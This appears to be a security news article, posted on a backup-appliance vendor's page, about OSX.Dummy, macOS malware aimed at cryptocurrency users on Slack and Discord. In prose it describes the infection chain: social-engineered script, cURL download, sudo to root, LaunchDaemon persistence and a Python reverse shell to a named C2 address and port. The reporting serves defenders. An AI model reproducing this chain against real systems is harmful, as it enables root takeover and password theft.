Cryptocurrency community targeted by MacOs malware

walden, system, systems, accordion, backup, back, up, ransom, ware, ransomware, data, recovery, critical, protection, walden systems, virus, security, nas, network storage
The Accordion system converts ordinary external HD into a NAS box and enables you to backup data using any usb based storage device whether it is RAID, SATA, ATA, IDE, SSD, or even CF-card. Accordion backup appliance is a self contained device that can utilize any external storage for backing up data. You can utilize existing excess storage on existing workstations or servers. You can use existing NAS storage or you can use any usb based storage device. Accordion is agnostic when it comes to where it backs up to or what technology is used for backup.



     Hackers using MacOS malware are targeting cryptocurrency investors that use both the Slack and Discord chat platforms. The malware, dubbed OSX.Dummy, uses an unsophisticated infection method, but those who are successfully attacked open their systems up to remote arbitrary code execution. If the connection to the attacker's C&C server succeeds, the hacker will be able to arbitrarily execute commands as root! on the infected system. The malware was first spotted and described by researcher Remco Verhoef, who posted his findings early Friday to the SANS InfoSec Handlers Diary Blog. The researcher said he observed multiple attacks last week.

     There have been multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary. Users are enticed by attackers to execute a script that in turn downloads a 34Mb OSX.Dummy malware via cURL. The download is saved to the macOS/tmp/script directory and then executed. The file is a large mach064 binary, rating a perfect score of 0/60 on VirusTotal. The binary is unsigned, adding that malware is able to sidestep the macOS Gatekeeper security software designed to prevent unsigned software from being downloaded and executed. Normally such a binary would be blocked by Gatekeeper. However if users are downloading and running a binary directly via terminal commands, Gatekeeper does not come into play and the unsigned binary will be allowed to execute.




     As the malware binary is executed, a macOS sudo command changes the malware's permissions to root. This will require the user to enter their password in the terminal. According to Apple, you must be logged in with an administrator account to execute a sudo command in Terminal on your Mac. The malware drops code in various macOS directories including /Library/LaunchDaemons/com.startup.plist, which gives the OSX.Dummy persistence. The bash script, which runs a python command, tries to connect to [185].243.115.[230] at port 1337 within a loop and the python code creates a reverse shell. To ensure execution during startup it creates a launch daemon. At the moment, the reverse shell fails to connect.

     Researchers note that if the attack is successful, and malware is able to connect to the hacker's C2 server, the attacker can take control of the infected system. This malware was dubbed the malware OSX.Dummy because one of the directories used to dump the victim's password is called /tmp/dumpdummy. Researchers called it such because the infection method is dumb, the massive size of the binary is dumb, the persistence mechanism is also dumb, the capabilities are limited, it's trivial to detect at every step, the malware saves the user's password to dumpdummy.